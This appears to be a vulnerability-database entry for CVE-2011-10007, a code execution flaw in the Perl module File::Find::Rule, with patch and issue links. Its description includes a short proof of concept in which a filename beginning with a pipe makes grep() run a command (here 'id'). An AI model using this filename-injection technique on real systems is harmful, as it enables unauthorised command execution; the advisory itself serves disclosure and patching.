QwikSec

Security Database

CVE

CWE

Training

CVE-2011-10007

Published: Jun 5, 2025

Modified: Jun 11, 2025

PUBLISHED

Description

File::Find::Rule through 0.34 for Perl is vulnerable to Arbitrary Code Execution when `grep()` encounters a crafted filename. A file handle is opened with the 2 argument form of `open()` allowing an attacker controlled filename to provide the MODE parameter to `open()`, turning the filename into a command to be executed. Example: $ mkdir /tmp/poc; echo > "/tmp/poc/|id" $ perl -MFile::Find::Rule \ -E 'File::Find::Rule->grep("foo")->in("/tmp/poc")' uid=1000(user) gid=1000(user) groups=1000(user),100(users)

Vendor	Product	Versions
RCLAMP	File::Find::Rule	affected `0 - <= 0.34`

Weaknesses (CWE)

References

https://metacpan.org/release/RCLAMP/File-Find-Rule-0.34/source/lib/File/Find/Rule.pm#L423

https://rt.cpan.org/Public/Bug/Display.html?id=64504

issue-tracking

exploit

https://github.com/richardc/perl-file-find-rule/pull/4

issue-tracking

https://github.com/richardc/perl-file-find-rule/commit/df58128bcee4c1da78c34d7f3fe1357e575ad56f.patch

patch

Security Training

Train your team to recognize and prevent security threats with our comprehensive security awareness program.

Vulnerability Scanning

Discover vulnerabilities in your applications and infrastructure before attackers do.